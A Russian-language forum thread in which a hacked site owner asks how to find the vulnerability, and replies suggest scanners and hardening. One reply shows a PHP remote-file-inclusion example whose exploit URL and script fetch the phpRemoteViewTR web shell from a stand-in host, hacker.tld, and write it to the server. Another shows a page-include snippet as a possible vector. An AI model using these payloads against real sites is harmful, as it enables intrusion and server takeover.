как искать дырки в взломанном сайте ? есть ли набор тестов ?

[kibi]

как искать дырки в взломанном сайте ? есть ли набор тестов ?

Недавно мой сайт (RedHat Enterprice 2 - 4.3.10 PHP + MySQL - 3.23.58) был взломан:
добрались до баз подписчиков и разослали письма от моего имени...
в одной из папок появился скрипт phpRemoteViewTR
чтобы ходить по серверу... как он туда попал и кто его положил - вопрос

Сижу восстанавливаю, ищу дырку...
есть ли какие-то наборы типовых скриптов, чтобы прогнать и проверить сайт на проблеммные места ?
что бы второй раз не попасться ?
или он-лайн сервисы может удаленные ?

я читал статьи и phpdetail... но может есть где сбито все по категориям ??
пароли, доступ, почта, фтп и т.п. ?

 

[MiRacLe]

типичная ошибка:
(особенно если register_globals On и allow_url_fopen On)
dummy.php

 // many lines 
   include ($file);
 // many lines

http://victim.tld/dummy.php?file=http://hacker.tld/evilscript.txt

evilscript.txt

 .....
   $file = file_get_contents('http://hacker.tld/phpRemoteViewTR.txt');
   if (!file_exists('prvt.php')) touch('prvt.php');
   $fd = fopen('prvt.php','w');
   fwrite($fd,$file);
   fclose($fd);
 .....

 

[Фанат]

я, кажется, знаю, что означают буквы TR хехе

 

[DiMA]

и чё?

 

[Фанат]

да он задолбал, если честно, тут ошиваться

 

[DiMA]

http://web-lab.dvgu.ru/stats/aikido/usage_200401.html

О, как. Согласно статистике этого сайта, Ремвью дает 50% от всех заходов из поисковых машин =) Ставьте ремвью к себе, индексируйте в яндексе и ваш сайт станет необычайно популярным

 

[kibi]

ну я зашел на сайт рнр.спб.ру - почитал что это за утилита
но вот как она туда попала ?
стоял еще форум рнрББ последний.. может через него ?

 

[Фанат]

может

 

[neko]

> как искать дырки в взломанном сайте ? есть ли набор тестов ?
есть и ты их провалил

 

[Falendysh]

neko
ты б чёта посоветовал человеку.. Он и без тебя понял, что тест провален..
XSpider 6.5 -- Free
XSpider 7 - за рубли
Говорят, многое ищет
----------------------------
Вопрос По делу -- через mod_rewrite можно поломать, если :
Rewrite Rule:
RewriteRule ^([a-zA-Z0-9\-]*)\.htm$ index.php?action=static&page=$1 [L]

В index.php

............
switch($action){
case "static" : {
			if(file_exists("templates/pages/".$page.".html")){
				$smarty->assign("inner", "pages/".$page.".html");
			}
			elseif(file_exists("templates/pages/".$page.".htm")){
				$smarty->assign("inner", "pages/".$page.".htm");
			}
			else{
				$smarty->assign("inner", "pages/index.htm");
			}
			break;
		}
}
..........

 

[neko]

можно то можно это
вы не пробовали прийти к слесарю и спросить у него тесты для замка на двери в квартире?

-~{}~ 23.05.05 20:52:

и вообще это скользкая тема
потому что тулзы некоторые ищущие валят старый дырявый софт
и являются очень легким путем к поиску чужих, а вовсе не своих дырок

 

[kibi]

хорошо, а есть каки-то люди, конторы, которые могли бы скажем за деньги проверить защиту...и мезанизм работы ?
при условии конечно что я докажу что это мой сайт а не что я нехороший человек ?

 

[neko]

если честно сомневаюсь
насколько я знаю у нас никто в IT аудитом безопастности не занимается
да и оно тебе надо ли?

 

[DiMA]

да такие люди тебя сейчас завалят предложениями ... Я даже знаю, как их зовут - ламеры

 

[kibi]

понятно
печально ...

 

[Нечто]

Как вариант можно пока отрубить allow_url_fopen и убрать права на запись в директории.

 

[kibi]

хорошая идея запретить запись в папке.. но это если "редиска" не добрался до Телнета или ССШ...

 

[Найч]

ага... и пусть пока не смогут ничего на форуме аттачить, заливать свои картинки и даже менять/загружать аватару

 

[confguru]

стоял еще форум рнрББ последний.. может через него ?

Кроме него что еще стояло? Upload разрешен?
allow_url_fopen?

Видишь ли ты через ремвью папки соседей по хостингу?

 

[Alexandre]

а есть каки-то люди, конторы, которые могли бы скажем за деньги проверить защиту

на сколько мне известно, конторы такие есть (сам не пользовался их услугами, но предложения встречал ), которые могут найти твои дыры, но по карману ли это твоему сайту?
расценки идут от килотонн баксов.